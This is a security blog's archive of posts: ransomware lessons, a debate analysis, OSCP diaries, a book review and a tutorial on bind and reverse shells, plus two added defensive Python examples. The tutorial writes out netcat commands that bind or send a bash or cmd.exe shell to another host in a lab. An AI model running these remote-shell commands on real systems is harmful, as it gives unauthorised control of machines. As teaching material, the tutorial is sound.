Tag Archives: Network Security

WannaCrypt and Petya: Lessons Learned

There has been a lot of talk about the lessons that should be learned from the recent spate of ransomware outbreaks, namely WannaCrypt and Petya.
I think one of the main lessons is that the security services shouldn’t be hoarding zero days and the tools to exploit them, especially if they can’t properly secure them.

The thing to remember, however, is that both WannaCrypt and Petya had patches available before they hit (probably because Microsoft were tipped off in advance), and both also took advantage of poor configuration.

Additionally, many organisations that were hit hard could have avoided some (possibly all) of the pain if they had standard belt-and-braces security practices in place.

The main lesson organisations should learn is that they should get the basics right.

For example:

Vulnerability Management

Conduct regular vulnerability scanning; understand the security posture of all assets, what vulnerabilities are present, what threats relate to those vulnerabilities, and what risk they pose to the IT estate and the business it serves.
This includes both missing patches (e.g. MS17-010) and poor configuration (e.g. having SMBv1 enabled).

This should all be supported by proper processes that allow for ongoing discovery, remediation of vulnerabilities (either via action or risk acceptance) and confirming remediation.

Ideally, all risks across the entire IT estate should be known about and managed.

Additionally, roles and responsibilities should be assigned to ensure that all of the above is done correctly. This includes security managers, security analysts, vulnerability managers, IT technicians, etc.

Patch Management

Ensure that patches are deployed in a timely manner. This doesn’t just mean pushing the latest Patch Tuesday patches. This also includes understanding what software you have in your IT estate and having a full inventory of assets to make sure everything is patched.
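
The two points above, that a missing patch and a weak configuration have to be judged together, and that remediation is only done once a rescan confirms it, are easy to lose in a spreadsheet. The following is an added example (not the post’s own code) of a small triage over a constructed asset inventory: MS17-010 and SMBv1 come from the post, while the asset names, the “supported” flag for end-of-life operating systems and the scanner fields are assumptions made for the example.

```python
"""Vulnerability triage for the MS17-010 / SMBv1 exposure described in the
post. Added example, not the post's own code; the inventory is constructed."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Asset:
    name: str
    os: str
    supported: bool        # vendor still ships security patches for this OS (assumption)
    patches: frozenset     # security bulletins the scanner confirmed as installed
    smbv1_enabled: bool    # SMBv1 still switched on (configuration finding)
    smb_reachable: bool    # TCP/445 reachable from other network segments


SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "info": 3}


def triage(asset):
    """Return (severity, action) for one asset.

    The missing patch and the enabled legacy protocol are scored together:
    the same missing patch is worse when the vulnerable service is on and
    reachable, and an unsupported OS cannot be patched at all, so its only
    remediations are isolation or a recorded risk acceptance."""
    missing = "MS17-010" not in asset.patches
    if not missing and not asset.smbv1_enabled:
        return ("info", "no action")
    if missing and not asset.supported:
        return ("critical", "no vendor patch: block 445 to the host or record a risk acceptance")
    if missing and asset.smbv1_enabled and asset.smb_reachable:
        return ("critical", "apply MS17-010 and disable SMBv1 now")
    if missing:
        return ("high", "apply MS17-010")
    return ("medium", "disable SMBv1")


def prioritise(assets):
    """Work list: worst severity first, then by asset name for a stable order."""
    rows = [(a.name,) + triage(a) for a in assets]
    return sorted(rows, key=lambda r: (SEVERITY_ORDER[r[1]], r[0]))


def confirm_remediation(before, after):
    """Compare two scan snapshots (name -> Asset). Returns (fixed, still_open).

    An asset only counts as fixed when the fresh scan shows severity 'info';
    this is the 'confirming remediation' step, rather than trusting a ticket."""
    fixed, still_open = [], []
    for name, old in before.items():
        new = after.get(name, old)           # missing from the rescan: assume unchanged
        if triage(old)[0] != "info" and triage(new)[0] == "info":
            fixed.append(name)
        elif triage(new)[0] != "info":
            still_open.append(name)
    return sorted(fixed), sorted(still_open)


# Constructed inventory (not real hosts), as a scanner might report it.
INVENTORY = {a.name: a for a in [
    Asset("file-srv-01", "Windows Server 2012", True, frozenset(), True, True),
    Asset("xp-imaging-01", "Windows XP", False, frozenset(), True, True),
    Asset("laptop-07", "Windows 10", True, frozenset(), False, False),
    Asset("print-srv", "Windows Server 2012", True, frozenset({"MS17-010"}), True, False),
    Asset("dev-ws", "Windows 10", True, frozenset({"MS17-010"}), False, False),
]}

# Constructed rescan after the first remediation round.
AFTER_RESCAN = dict(INVENTORY)
AFTER_RESCAN["file-srv-01"] = Asset("file-srv-01", "Windows Server 2012", True,
                                    frozenset({"MS17-010"}), False, True)
AFTER_RESCAN["laptop-07"] = Asset("laptop-07", "Windows 10", True,
                                  frozenset({"MS17-010"}), False, False)

if __name__ == "__main__":
    for name, severity, action in prioritise(INVENTORY.values()):
        print(f"{severity:8} {name:14} {action}")
    print("fixed / still open:", confirm_remediation(INVENTORY, AFTER_RESCAN))
```

The ordering puts the unpatchable Windows XP host alongside the exposed, unpatched file server, which is the point: an unsupported system with no patch available needs a decision (isolate it or formally accept the risk), not a ticket that quietly waits for a patch that will never arrive.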

Removable Media Controls

Ensure removable media is limited to sanctioned devices only. Ideally, I would blacklist all removable media and whitelist only what you approve. (This is just my view, however.)

Malware Prevention

Ensure you have some kind of AV on all endpoints, at least the classic heuristics and definition-based AV (although there are more advanced solutions available), and make sure it is up to date and working.

Disaster Recovery

Ensure you have backups, including off-site, off-line backups of critical data.

Incident Management

Ensure you have a plan to react to a major security incident; ensure you have the right people in the right places, supported by the right processes.

Control User Privilege

This one goes without saying really: make sure that all users have the least amount of privilege possible. This should be supported by processes to ensure that this is audited regularly.

User Education and Engagement

Ensure all staff understand the security policy of your organisation. Conduct exercises such as phishing campaigns to test your users, and provide training to allow them to understand the risks involved and be better prepared to spot phishing emails, phishing websites, social engineering, etc. (Again, this is just a view; some people may suggest that security shouldn’t be a user problem, it should be an IT problem.)

Good Network Security Hygiene

Have the correct access controls, know what is on your perimeter, ensure you have properly configured firewalls at all appropriate places in your network (with regular rule audits and reviews), have IDS/IPS where required, and make sure that VLANs are properly set up with as much segmentation as is required. Ensure that all remote users can connect securely and that any devices they connect from are patched to at least the same level as devices already on the network. Also, make sure that you have robust BYOD controls.

Scot Gov: Cyber Resilience Debate Analysis

Some analysis on the Scottish Government’s Deputy First Minister, John Swinney’s opening statement during the “Safe, Secure and Prosperous: Achieving a Cyber-resilient Scotland” debate last week.

John Swinney Scottish National Party

“Our focus in this afternoon’s debate recognises the urgency for everyone to secure their technology, data and networks from the many threats that we face, and proposes that citizens and organisations must become more resilient, aware of the risks, and able to respond and recover quickly from any kind of cyberattack.”

The debate appears to be in response to WannaCrypt; it may have been planned in advance, I’m not sure. Regardless, it is good that cyber security is still very close to the top of the agenda for the Scottish Government.

Daniel Johnson Labour

“… our response is vital, but so is prevention. One of the key issues with the recent attack was … Windows XP … Does the Scottish Government have a target date for removing Windows XP from … across the Scottish Government?”

John Swinney Scottish National Party

“The key question that we have to address is how we establish and maintain the most rigorous level of security possible on all systems that are used. In certain circumstances, there may be an appropriate use for the systems to which Mr Johnson referred.
However, the crucial thing is that security arrangements must be in place to ensure that the necessary precautions are taken.”

Sounds like mitigation is king, which makes sense given the circumstances. But I also think there needs to be a plan to ensure that unsupported operating systems are replaced, a desktop replacement programme at the very least. NHS Scotland should act as a single entity to leverage the best deal during the procurement process.

It would be interesting to see what legacy requirements depend on Windows XP. I understand that some of the systems purchased by the NHS are long-term investments and may require Windows XP, but I would hope that these considerations are taken into account when making such purchases. Would it be that hard or expensive to include clauses in contracts that require vendors to keep these systems fully secure and supported throughout their entire lifecycle? How do other countries or private healthcare providers manage this? Is Linux a viable option in terms of procurement? Would it be any more secure anyway? What would the total cost of ownership be?

John Swinney Scottish National Party

“Any business that can successfully demonstrate that it has taken steps to protect its own and its customers’ data, as well as to respond to and bounce back from any cyberattack, is in a strong position to grow in the digital age. Organisations that can demonstrate their resilience to cybercrime can gain a competitive advantage and increased consumer confidence. Therefore, developing cyber-resilience as a core part of an organisation’s business strategy will ensure that the organisation continues to take full advantage of the internet age and to flourish into the bargain.”

Very high level, standard but sensible advice, echoing what we have seen from the UK government.

John Swinney Scottish National Party

“Social engineering is one of the simplest ways of overcoming our technical defences. We should not blame users. They are not the weakest link, as is often said; they are essential assets. Links and attachments are common in the workplace and that is why they are exploited. … Therefore, part of our response must be to get the basics of online security correct. That includes raising the knowledge and awareness of all our citizens about the risks and the steps that they can take to reduce them.”

A little bit of spin here. I think highlighting user education is right; it would be interesting to see if there is some follow-up to the citizen awareness line at the end there. Some kind of government-sponsored education campaign to inform users of the risk of phishing, vishing and all their variants would be helpful and a quick win for everyone involved.

In saying this I also believe that businesses need to take responsibility and run their own education programs for their users. From personal experience I know user education lowers risk.

Dean Lockhart Conservative

“Does the cabinet secretary agree that additional availability of computing skills teaching at all school levels would help to address some of those issues?”

John Swinney Scottish National Party

“Obviously, computing science is an integral part of the curriculum, and it is part of some of the earliest stages of primary education. I have seen various coding initiatives in primary schools that have involved primary 3 and 4 pupils. I firmly support the importance of ensuring that young people are exposed at the earliest possible ages to computing education and that they are able to acquire the skills and attributes that are necessary for them to prosper.”

Some good initiatives here, and the Scottish Government has made great progress in this area (if anything, I think Mr Swinney underplayed some of the work being done). There is always more that can be done, however.

I gave a talk to some primary 3 and 4 pupils recently, and most of the knowledge these kids had on cyber security focused around game hackers. One thing was undeniable, however: the kids were very enthusiastic, engaged and willing to learn.

I think having some cyber security on the curriculum nationwide for kids as young as 7 or 8 would be a great way to capitalise on this enthusiasm; it could be used to educate kids about the general dangers of being online at the same time.

There is a lot of impressive progress with older kids and young adults, especially in the further and higher education space, which has been supported by the Scottish Government. Only time will tell if it is enough.

John Swinney Scottish National Party

“The digital Scotland business excellence partnership has provided £400,000 to help businesses in Scotland to improve their cyber-resilience and work towards achieving the cyber essentials standard.”

Good to see the Scottish Government throw its weight behind this scheme. One of the things I like about it is that it gives a target for some basic baseline security controls over a number of domains, as well as introducing a form of compliance for organisations that may not have any compliance requirements. I think external audits of any kind are great for sharpening the mind and focusing attention.

John Swinney Scottish National Party

“The Government’s investment in the area is specifically to support a range of hardware and software measures to protect its information and communications technology systems, infrastructure and data; to improve its network monitoring capabilities; to boost staffing in the area, which is vital in order to have the skills available to handle the challenges; to establish and expand a cybersecurity operations centre; and for corporate education awareness and training across the board.”

I like the idea of continuous monitoring and SOCs; they are definitely a good way to spot and prioritise cyber risks quickly. Although, from my experience, there is a big skills gap in this area; whether this is down to the explosion in the prevalence of SOCs or not, I do not know.

SOCs need to be implemented correctly if they are to work; there is no point in having a SOC if it isn’t running at operational maturity, and getting to maturity can be a painful process.

Many vendors now offer SOC as a service, which is a good way for private organisations to get access to a SOC’s capabilities without massive cost or having to endure the painful maturation process. I do not think this would be an option for the public sector, however, due to national security concerns. This could prove expensive, especially if a dedicated Scottish Government SOC was rolled out to all local government, schools, hospitals, etc. I can see this one being fully outsourced (which, to be fair, is probably the best way to go about it).

John Swinney Scottish National Party

“It is essential that, across a range of different areas—on learning and skills, on the role of the private sector, on compliance with the European Union general data protection regulation and on the securing of our critical infrastructure—we make cohesive and coherent efforts to ensure that we are equipped to meet the challenges.”

A wild GDPR reference appears. This is an area the government should be focusing on, and, along with the ICO, doing everything it can to help Scottish businesses get ready for. With fines of up to 4% of revenue, there is a real chance that this could impact the Scottish economy. It looks like the Scottish Government is ready to do its bit.

The full debate can be viewed here: http://www.scottishparliament.tv/20170524_debates

OSCP Diary 3

I didn’t intend on taking so much time in between posts, but with work, Christmas and the OSCP I have been swamped!

So sitrep: Progress has been slow and steady, maybe a little slower than I would have liked…in fact definitely slower than I would have liked.

So my main issue has been myself: I am arrogant, I procrastinate a lot and I am weak!

So let me explain each in turn; I am arrogant. Coming into the OSCP, I was telling myself, how hard can this be, you’ve been in this game for a few years now, you have lots of Linux experience, you have used most and if not all of these tools before. This should be a formality.

Well it turns out it isn’t a formality, yes I have been in this game before, but never on the attacking side, sure I’ve done the vulnhub stuff, the uni classes and even a little bit of dabbling in the real world, but this is different, it isn’t just about knowing how to use the tools or following tutorials. This requires you to sit down and plan and conduct the tools like a conductor conducts an orchestra. This is about knowing what to use when, about what steps to take first, about developing a repeatable but dynamic process.

This is hard….way harder than it sounds, I think the only way to really learn this is via time, practice and effort.

While we are on the subject of effort, let’s move on to my next failing: procrastination. All too often I have got up and told myself, today I will spend the entire day on this... and sometimes I do. But that also involves picking up my phone to check Facebook, stopping to make tea, going on YouTube, etc. etc. This wastes lots of time. I need to stop this.

My next failing is weakness….I will admit it, I have had the “I can’t do this” moment(s), it has hit me and it has hit me hard.

I will be working on a box, I will be following an attack vector all is well, I’m in full on Neo from the matrix mode…then boom. Brickwall….I get stuck and I cannot get any further. This has happened to me a few times now.

But…a few days ago I hit a milestone, I pwned not 1..but 2 boxes. Sure they were exploiting the same vulnerability, but the joy of getting a shell on those boxes with a custom exploit was good!

I had my first “I CAN DO THIS!” moment, from these I have had a number of small victories, finding the odd thing here and there, I am beginning to feel like I am making progress.

Right, that is enough for today. I’m not sure exactly when my next post will be, but I will try to make it sooner than this one took me!

OSCP Diary Day 2 and 3

I’m now on day 3 of 90 of the OSCP. How has progress been!?…well, steady.

Time has been tight, with work, family, etc. It’s hard to set aside blocks of time to really sit down and concentrate. I have the luxury of being able to do a bit at work (because my work is awesome!), but much of that is broken up in between work stuff (which obviously takes priority), so I haven’t had a huge amount of time to just sit down and focus on working through the course work.

But steady progress is better than no progress… and today…*druuum roooollllll* I popped my first box. Although it was very…VERY low hanging fruit.

I have also made some great progress in regards to enumeration. So all in all, the last couple of days while not being perfect have been okay.

I will need to take a day off tomorrow as I am attending a cyber security conference (which I am really pumped up for), but I will be back in action on Friday.

I’ve still not had that “I can’t do this” moment... but I haven’t tried hard enough yet. On Friday I hope to have a few hours to dedicate to this, so maybe that moment will come then!

Meaningful time in labs: 9 hours.

OSCP Diary Day 1

Welcome to my OSCP diary, somewhere for me to brain dump my thoughts as I work my way through the Penetration Testing with Kali Linux (PWK) course and then take the Offensive Security Certified Professional (OSCP) Exam.

The PWK/OSCP are under strict NDA so I will not be going into details here, I will be very general and very vague. So if you are looking for PWK tutorials and howtos, then you have come to the wrong place.

After weeks of waiting I finally got my OSCP lab access last night at 0000 Hours, as the bell tolled midnight the email that I had not patiently waited for was finally delivered.

The plan was to wait up until midnight, get the email, download all the stuff that I needed to get onto the labs, all the course materials etc. etc., then go to bed, get a solid 7 hours’ sleep and be ready to spend Sunday pwning n00bs and popping shells!

So that was the plan; the reality, however, was somewhat more chaotic. Like a schoolboy at Christmas I had been getting a little hyped up over the last few days, counting down the minutes to 0000 on my lab access day, thus I was already a little sleep deprived when I waited up to receive my email.

So the email comes in and I feel the rush of adrenalin surge through me (well, about as much of a rush as you can get from receiving an email after a 20 hour day), and off I go dutifully downloading all the stuff I needed.

So I finished getting all the stuff and headed off to bed and sleep for a solid 7 hours….no I’m just kidding. I thought to myself, “ahh well I may as well configure everything just now so I’m ready to go in the morning.”, so off I go configuring all the things, getting everything just so.

It is now around 0100 everything is downloaded, everything is configured, all I need to do now is get some shut eye.

“But maybe I should just have a wee tincy wincy look at what I have in store for me”….so I open the course materials, pop on the forums, check out the IRC…it’s now 0200.

My mindset has now changed, I’m now thinking “well, I’ve gone this far, I may as well get on the labs and have a look”... 3 hours later it’s 0500 and I’ve just sat up all night, excitedly scanning all the things!
At this stage tiredness gets the better of me and I decide to call it a night (well technically morning).

So to bed I go; three and a bit hours later I’m awake again. It is now 0830 and I am feeling compelled to get back into the labs. So to the labs I go... now it may be the sleep deprivation, it may be the excessive amount of espresso I’ve consumed, or it could be a combination of both, but I could not focus on any one thing. I must have wasted hours jumping around from one thing to another. I went from going rogue and jumping ahead of the game, hitting random boxes, to deciding to slow down and methodically work my way through things from beginning to end.

In the end, it is now approaching 1800 and I need to get things ready for the day job tomorrow (to whom I owe a big thank you for putting me through the OSCP!), and I need to step away for a bit and let everything from the last 18 hours sink in.

The two takeaways from day 1 are:

1: Sleep (it is a requirement unfortunately)
2: Plan ahead and prepare your day. (this will save a lot of time later on!)

Now roll on day 2 (of 90).

Meaningful time in labs: 6 Hours

What are Bind and Reverse Shells?

I wanted to make a very short and simple post about shells…when starting out in pen testing you will hear a lot of chatter about shells, so this post hopes to clear up some of the terminology involved.

Now I guess that since you are reading this you’re already familiar with what a shell is (if not, have a look here). What I wanted to cover was bind shells and reverse shells, and what exactly the differences are. To do this we are going to run through a short exercise using the classic Netcat.

What you will need for this exercise are two machines on the same network segment, both with a copy of Netcat on them. They can be any combination of Linux or Windows (or something more exotic and/or $expensive = Macs).

For this exercise I spun up a couple of VMs, one Kali Linux box and one Windows Server 2012 box.

Netcat is included on Linux distros that come with Nmap as standard, or it can be downloaded from most standard Linux repos; for Windows you can pull nc.exe from the web.

Netcat is a simple (but powerful) command line tool that has become something of a legend in the networking and security worlds. Put simply, Netcat can throw up listening TCP and UDP ports very quickly, and, unsurprisingly enough, it can also connect to TCP and UDP ports just as easily.

Netcat comes into its own, however, with its power to read and write bits to and from these connections; this allows Netcat to perform a vast array of functions. For more, have a look at the Netcat man page.

It is Netcat’s ability to read and write to layer 4 connections and streams that allows us to create the shells. This is done by redirecting the three shell I/O streams (stdin, stdout and stderr) over the layer 4 connection.

The nuances of what is a bind shell and what is a reverse shell are dictated by the client server paradigm.

Okay, demo time, so either play along at home or just put your feet up and watch. *Read*

Our two boxes are Wendy (the Windows box) and Lynn (the Linux box).

So we will start with a bind shell. This is really quite simple: a bind shell is called a bind shell because it binds a shell to a listening TCP port. For example:

Lynn the Linux box wants to bind its bash shell to a listening port; the following command can be used to do this:

Lynn: nc -nlvp 9874 -e /bin/bash

Let’s break that command down: nc is the Netcat binary; -nlvp means numeric (no DNS lookups), listen, verbose and port, with 9874 as the port argument, i.e. the port that will be set to listen. The -e option names a program to be executed after the connection is established; in this instance that program is /bin/bash, our shell.

Now when a connection is established to Lynn’s port 9874, the bash shell will fire up and proceed to redirect its I/O streams across the connection. So if we connect to it from another box we can access Lynn’s shell; let’s do this from Wendy:

Wendy: nc -nv <Lynn’s IP address> 9874

And that’s it... it’s that simple: we now have control over an instance of bash running on Lynn from Wendy. From Wendy we can issue commands and see their output.

The reason this is known as a bind shell is because the shell is bound to the listening port, but what if we want to access Wendy’s Shell from Lynn while still maintaining the same Client/Server paradigm?

Well, thankfully, this is just as easy; what we are about to do is known as a reverse shell. First, as before, we will set up a listening TCP port on Lynn; this time, however, we are not going to bind a shell to the listening port.

Lynn: nc -nlvp 9874

Now on Wendy we are going to connect to Lynn’s listening port of 9874; this time, however, we are going to attach Wendy’s cmd.exe shell to the client end of the conversation.

Wendy: nc -nv <Lynn’s IP address> 9874 -e cmd.exe

We now have access to Wendy’s shell on Lynn. There are a number of reasons why we might choose between bind and reverse shells; the main one, as far as pen testing goes, is basic evasion: connections may be allowed in one direction but denied in the other. If Wendy and Lynn were on two separate network segments with a firewall in the middle, for example, the firewall might allow outbound connections but deny inbound ones.

In the example above Lynn acted as the server and Wendy as the client, but this paradigm can be reversed with exactly the same results for both bind and reverse shells, simply by setting Wendy to listen instead of Lynn.
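
Seen from the other side of the firewall the post mentions, the two shells leave different footprints: a bind shell is a shell hanging off an unexpected listening port, a reverse shell is a shell hanging off an outbound connection. The following added example (not the post’s own code) shows how a defender tells them apart from a host snapshot. Every process and connection record is constructed; on a real Linux host the same facts come from /proc/<pid>/fd (are fds 0 to 2 sockets?), /proc/<pid>/stat (parent pid) and ss -tnp (connections and listeners). The hostnames Wendy and Lynn follow the post; the IP addresses 10.0.0.10 and 10.0.0.20 are made up for the example.

```python
"""Spotting bind and reverse shells from the defender's side. Added example,
not the post's own code; all process and connection records are constructed."""
from dataclasses import dataclass

# Interpreters that should normally have a tty or pipe on stdio, not a socket.
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    comm: str
    stdio_socket: bool   # True if fd 0, 1 or 2 resolves to socket:[inode]


@dataclass(frozen=True)
class Conn:
    pid: int             # process that owns the socket (as `ss -p` reports it)
    lport: int
    raddr: str
    rport: int


def classify_shells(procs, conns, listeners):
    """Return (pid, comm, kind, peer) for each shell whose stdio is a socket.

    kind is 'bind' when the connection arrived on a port the owning process
    has in LISTEN (the shell was bound to a listener), 'reverse' when the
    owning process opened an outbound connection, and 'unknown' when no TCP
    connection can be tied to the shell or any of its ancestors."""
    by_pid = {p.pid: p for p in procs}
    conn_by_pid = {c.pid: c for c in conns}
    findings = []
    for p in sorted(procs, key=lambda p: p.pid):
        if p.comm.lower() not in SHELLS or not p.stdio_socket:
            continue
        # The socket is usually owned by the parent that spawned the shell
        # (nc -e), or by the shell itself when nc exec'd it; walk upwards.
        cur, conn = p, None
        while cur is not None and conn is None:
            conn = conn_by_pid.get(cur.pid)
            cur = by_pid.get(cur.ppid)
        if conn is None:
            findings.append((p.pid, p.comm, "unknown", None))
            continue
        kind = "bind" if (conn.pid, conn.lport) in listeners else "reverse"
        findings.append((p.pid, p.comm, kind, f"{conn.raddr}:{conn.rport}"))
    return findings


# Constructed snapshot of Lynn (10.0.0.20): an interactive login shell
# (harmless), a bind shell as in the post (nc listening on 9874 with
# -e /bin/bash), a reverse shell that connected out to a listener on Wendy
# (10.0.0.10), and a shell on a socket that nothing accounts for.
PROCS = [
    Proc(900, 899, "bash", False),     # login shell on a pty: ignored
    Proc(1200, 1, "nc", False),        # nc -nlvp 9874 -e /bin/bash
    Proc(1203, 1200, "bash", True),    # bash spawned by nc, stdio = socket
    Proc(1310, 1, "nc", False),        # nc -nv 10.0.0.10 9874 -e /bin/bash
    Proc(1311, 1310, "bash", True),
    Proc(1400, 1399, "sh", True),      # parent gone, no TCP connection found
]
CONNS = [
    Conn(1200, 9874, "10.0.0.10", 51522),   # accepted on the 9874 listener
    Conn(1310, 40022, "10.0.0.10", 9874),   # outbound to Wendy's listener
]
LISTENERS = {(1200, 9874)}                  # (pid, local port) in LISTEN state

if __name__ == "__main__":
    for finding in classify_shells(PROCS, CONNS, LISTENERS):
        print(finding)
```

The classification rests on the client/server paradigm the post describes: an accepted connection shares its local port with the listener, so a shell tied to a socket whose local port is in LISTEN for the same process is a bind shell, and anything else is an outbound (reverse) connection. That is also why egress filtering and logging of outbound connections matter as much as blocking inbound ones: the reverse shell is exactly the case where the firewall’s inbound rules never get a say.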

Answering the question, no one asked…

I have to be honest I do love myself a pocket reference guide. Even with the internet’s vast resources there is something about holding an old school, analogue, physical copy of a book that is pleasing in a way that searching the internet just isn’t.

The strange thing is that, despite their name, I’ve never actually carried one of these books around in my pocket, which led me to assume that they didn’t fit in real pockets....

Well as it turns out, predictably and obviously I was wrong….
Book Review: Hacked Again

Scott N. Schober’s Hacked Again has emblazoned across its cover ‘It can happen to anyone, even a cybersecurity expert.’ And so it begins, Scott is a cybersecurity expert and CEO of a hi-tech firm, in Hacked Again he takes us through his journey of being the victim of cyber crime, while along the way providing a plethora of expert and common sense advice on how to avoid finding yourself at the wrong end of cyber fraudsters.

Scott opens the book with an anecdote from his youth, opening his first bank account in a friendly local bank where people were on a first name basis, he describes the evolution of this bank and how through a series of mergers, acquisitions and takeovers it has become a modern day banking machine, impersonal and globalised. As the anecdote goes on Scott subtly drops little hints that will become relevant later.

This leads the reader seamlessly into how Scott first realised he had been hacked for the first time. One morning Scott noticed he had a number of suspicious transactions on his business account, after a little investigating it dawned on him…his account had been compromised. And so the motto on the cover proves true…‘It can happen to anyone, even a cybersecurity expert.’

As Scott looks into the compromise it begins to dawn on him, that perhaps it’s not a case of ‘it can happen to anyone even a cyber security expert’ and more a case of, ‘it can happen to anyone, especially a cybersecurity expert.’ While his business account was being investigated, Scott switched to his personal account, only to realise that was also being targeted. It was then Scott began to suspect he was being specifically targeted, that his bank credentials had been compromised and were being traded on the dark web by criminals who wanted to make an example out of the cyber security experts that make their life harder.

From here Scott describes yet another fraud his company was nearly the victim of. After receiving an order for high-priced items to be sent by special delivery as soon as possible to an address in Indonesia, Scott’s company dispatched the items, only to receive a call from an angry lawn mower repair company demanding to know why it had been charged for the aforementioned items that were currently winging their way to Southeast Asia.

Thanks to the timely phone call, Scott was able to put a halt to the order and recover the items. The lessons Scott learned? Well, amongst other things, timely incident response is critical, and if something seems too good to be true... it usually is.

Hacked Again then goes on to detail other cyber crimes involving identity theft, credit card fraud, social engineering as well as the tactics deployed by the attackers and the strategies to protect yourself from them. There are many themes that emerge as the book goes on such as who to trust, how to trust, defence in depth, password hygiene, internet browsing habits and the jarring reality of the divergence of feeling secure and actually being secure.

This book takes the reader on a whirlwind tour of all manner of cyber crime; it covers malware from spyware to ransomware. Scott provides advice on how to avoid being compromised via spear phishing emails, which have gone from being very easy to spot with their broken English and low-res pictures to very convincing emails that look and feel the part. One of the golden nuggets buried in Hacked Again is that it not only tells you how to avoid being compromised but what to do if and when you are compromised.

The book continues to follow this blend of storytelling that is part anecdote, part ‘how to’ and part ‘how not to’. It moves swiftly and logically from one subject to the next. It is a book that does not linger on a subject long enough for it to become boring or uninteresting. Instead the book flows and is very easy to read; I was shocked when I first sat down to read Hacked Again only to realise two hours had passed in what seemed like the blink of an eye. Much of this is due to the graceful manner in which the author moves from one subject to the next.

The question I found myself asking when reading Hacked Again was ‘who is this aimed at?’ My conclusion was that this book is a must read for C-level management and small to medium business owners, as well as ICT managers across the world. It gives an overview of the risks businesses face in today’s connected world, while providing tangible and relatable real-world examples of these risks becoming real-life problems.

But they are not the only people who should read this book; anyone with any kind of online presence could benefit from reading Hacked Again, and that includes everyone from your grandparents to your computer science graduate buddies and, yes, even cyber security experts. Another group who will find this book of interest, and perhaps not its obvious audience, is anyone who fancies themselves as an expert in a particular field. In the latter stages of the book Scott discusses his experience as a media go-to expert on cybersecurity; this is one part of the book I found surprisingly insightful, if not entirely relevant.

This book fits a niche: it is not a focused investigation into a specific topic like Brian Krebs’ Spam Nation, Misha Glenny’s DarkMarket or Kim Zetter’s Countdown to Zero Day, nor is it a technical tour de force like that found in a Bruce Schneier book. Hacked Again just touches on those subjects, giving the reader awareness of them as examples of the darkness that is lurking out there. What this book is, is an exquisitely written warning, but not only a warning: it is a manual on what you can do to keep yourself and your business safe, and this is where its true value lies.

Hacked Again is a veritable 101 on the risks of cybercrime and cyber security, an impeccable overview of the whos, the whats and the hows of information security, and it gives this overview without ever slipping into hyperbolic hysteria in order to get its point across.

Scott’s manner of storytelling is seamless: he starts off on a thread and leads you down a path until its conclusion, all the while dropping breadcrumbs of advice and the lessons he has learned along the way. It’s an effective blend of storytelling and educating; at no point do you ever feel condescended to by the advice being dispensed. As a security researcher myself I know how easy it is to feel patronised when receiving security advice.

In the foreword for Hacked Again, radio host Jon Leiberman describes how Scott can translate complex technical details and tech talk into understandable information. This is true: Scott does know how to effectively demystify tech talk into non-intimidating, flowing and compelling storytelling. Hacked Again is the work of a man who knows his subject and of a man who has learned the lessons of what can happen when you are the victim of cybercrime; it is the work of a man who wants to pass on those lessons to the reader, and this is why it is a must read.

You can find Scott on Twitter @ScottBVS as well as following the Hacked Again Twitter account at @HackedAgainBook

About Scott Schober

Buy Hacked Again from Amazon UK

Buy Hacked Again from Amazon US

Get the audiobook from Audible UK

Get the audiobook from Audible US

Infamous IP Address Resurfaces

A couple of days ago researchers over at Sucuri posted a blog detailing some investigative work on suspicious redirects, which turned out to be the result of NameCheap’s free DNS service.

I won’t cover the detail of the blog (go read it, it’s a great piece of work), but one of the most surprising and interesting things uncovered (to me at least) was the resurrection of an IP address related to the prehistoric and infamous Conficker virus’s C2 domains.

So it just goes to show that I’m not the only person in security who likes to pay homage to the past, even if I do it in a slightly less conspicuous fashion.